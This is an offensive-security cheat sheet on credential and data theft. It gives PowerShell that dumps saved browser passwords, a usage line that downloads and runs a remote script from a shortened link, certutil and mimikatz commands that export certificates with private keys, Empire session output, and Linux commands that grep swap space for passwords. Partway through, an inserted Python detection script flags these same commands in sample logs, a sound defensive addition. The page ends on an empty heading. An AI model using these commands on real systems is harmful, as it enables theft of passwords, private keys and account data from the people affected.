Exfiltration

Data Exfiltration

Windows

Credentials from IE and Edge:

# Usage: powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/2K75g15')"
[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
$vault = New-Object Windows.Security.Credentials.PasswordVault
$vault.RetrieveAll() | % { $_.RetrievePassword();$_ }


Listing Certificates:

Get-ChildItem -Path 'Cert:\CurrentUser\My'

Dumping Certificates:

Get-ChildItem -Path 'Cert:\CurrentUser\My' | Where-Object { $_.hasPrivateKey } | Foreach-Object { certutil.exe @('-exportpfx', '-p', 'secret', $_.Thumbprint, "$($_.Subject).pfx") }

(Empire: PBDGVXBKMKM3VRTH) > shell Get-ChildItem -Path 'Cert:\CurrentUser\My'
(Empire: PBDGVXBKMKM3VRTH) >
   Directory: Microsoft.PowerShell.Security\Certificate::CurrentUser\My

Thumbprint                                Subject
----------                                -------
9F76F10EC329C4365ACC72E7BDC3A13AF5F0C3CA  CN=user1@corp.com
74B8E1DE4D2CD35A242FC3452E0EE73FDFBE1A6A  CN=911259, OU=People, O=Group
714B276BE0EB8C6B19157691899CC4CCA2F0B265  CN=2014-2029 Dev Root, O=Dev
708411B08CA25B987B94E229D50E1862DCDDACF8  CN=user2@corp.com
6FCDF1A4DF6DA730386D6DD1041D41618A7E08FB  CN=CC2 Dev Team, OU=iOS, OU=BYOD, OU=CIB, O=Group
66379C02D31D081574746B2FB95AF6ABF6D9740D  CN=911259, OU=People, O=Group
58369F020338A78D2B3A043F2963448A24A4ED97  CN=user3@corp.com
4FD61287C53BD30F12A90B1851ED35FF021EC5F0  CN=911259, OU=People, O=Group
3D3E74F2F1132FB82584D762FDFBD849524A0EAB  CN=2014-2029 Dev Mobile Devices, O=Dev
30089099A9717A5D7FA685F6FA53434B3BD07BF9  CN=911259, OU=People, O=Group

certutil.exe -exportpfx 9F76F10EC329C4365ACC72E7BDC3A13AF5F0C3CA foo.pfx

(Empire: credentials/mimikatz/command) > set Command crypto::capi privilege::debug crypto::cng "crypto::certificates"

Invoke-Mimikatz -Command 'crypto::capi privilege::debug crypto::cng "crypto::certificates /systemstore:local_machine /store:root /export"'

crypto::capi privilege::debug crypto::cng "crypto::certificates /systemstore:local_machine /store:root /export"

Get-ChildItem -Path 'Cert:\localmachine\My' | Where-Object { $_.hasPrivateKey } | Foreach-Object { &certutil.exe @('-exportpfx', '-p', 'secret', $_.Thumbprint, "$($_.Subject).pfx") }

set Command crypto::capi privilege::debug crypto::cng "crypto::certificates /systemstore:local_machine /store:root /export"
set Command crypto::capi privilege::debug crypto::cng "crypto::certificates /systemstore:local_machine /store:my /export"

privilege::debug crypto::cng "crypto::certificates /systemstore:local_machine /store:root /export"

Linux

Get Creds from Swap:

strings <swap_device> | grep "&password="
strings <swap_device> | grep -i 'email=' | grep @ | uniq
# etc...
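Detection logic for the techniques listed on this page (certutil -exportpfx, PasswordVault dumping, mimikatz crypto::certificates /export, and the swap-device grep above), as an added example that is not part of the original page: a few regex rules run over constructed, simplified command-line records. The `source|user|command` record format and the sample events are assumptions, not real log output.

```python
import re

# Constructed sample records (assumption: "source|user|command"), not real logs.
# Two benign entries are included so the rules can be checked for false positives.
SAMPLE_EVENTS = [
    "sysmon|corp\\alice|certutil.exe -exportpfx -p secret 9F76F10EC329C4365ACC72E7BDC3A13AF5F0C3CA user1.pfx",
    "ps_scriptblock|corp\\alice|$vault = New-Object Windows.Security.Credentials.PasswordVault; $vault.RetrieveAll() | % { $_.RetrievePassword(); $_ }",
    "ps_scriptblock|corp\\svc|Invoke-Mimikatz -Command 'crypto::capi privilege::debug crypto::cng \"crypto::certificates /systemstore:local_machine /store:root /export\"'",
    "auditd|root|strings /dev/sda2 | grep -i 'email=' | grep @ | uniq",
    "sysmon|corp\\bob|certutil.exe -verify cert.cer",
    "ps_scriptblock|corp\\bob|Get-ChildItem -Path 'Cert:\\CurrentUser\\My'",
]

# Each rule keys on the part of the command that does the credential export,
# not on merely listing the store, so read-only enumeration is not flagged.
RULES = {
    "certutil_pfx_export": re.compile(r"certutil(\.exe)?\b.*-exportpfx", re.I),
    "passwordvault_dump": re.compile(r"PasswordVault.*RetrievePassword", re.I | re.S),
    "mimikatz_cert_export": re.compile(r"crypto::certificates[^\"']*/export", re.I),
    "swap_credential_grep": re.compile(r"\bstrings\s+\S+.*\|\s*grep\s+.*(password|email)=", re.I),
}


def parse_event(line):
    """Split one record into its source, user and raw command line."""
    source, user, command = line.split("|", 2)
    return {"source": source, "user": user, "command": command}


def match_rules(command):
    """Return the names of every rule whose pattern matches the command line."""
    return [name for name, pattern in RULES.items() if pattern.search(command)]


def scan(lines):
    """Return (rule, user, source) tuples for every record that trips a rule."""
    hits = []
    for line in lines:
        event = parse_event(line)
        for rule in match_rules(event["command"]):
            hits.append((rule, event["user"], event["source"]))
    return hits


if __name__ == "__main__":
    for rule, user, source in scan(SAMPLE_EVENTS):
        print(f"[{source}] {user}: {rule}")
```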

Get Creds from SSH sessions:
Tool for extracting information from newly spawned processes